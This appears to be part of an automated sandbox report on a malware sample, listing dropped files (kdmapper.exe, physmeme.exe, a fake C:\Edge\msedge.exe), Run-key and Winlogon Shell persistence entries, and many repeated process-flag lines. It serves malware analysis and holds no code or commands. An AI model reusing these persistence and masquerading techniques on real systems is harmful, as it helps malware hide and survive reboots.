                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\WpXNITDI.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\iacMOeMk.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\XmyVeTRC.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\GfhqKgmo.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\EVLpKOHn.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\VPYFfuwr.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\NKJXVMBv.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\wDtsBZWh.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\TUtPMNAm.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\JlazcluE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\rWRTdVVu.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\MQUzRRxE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\zrKsasrd.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\fZXNGngO.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\VltWWbmg.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\NhvHKDkY.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\DqsZwsEl.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\uIZJMPyD.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\eGTFsMJp.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\UXzpIjDH.logJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOpJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOpJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOpJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
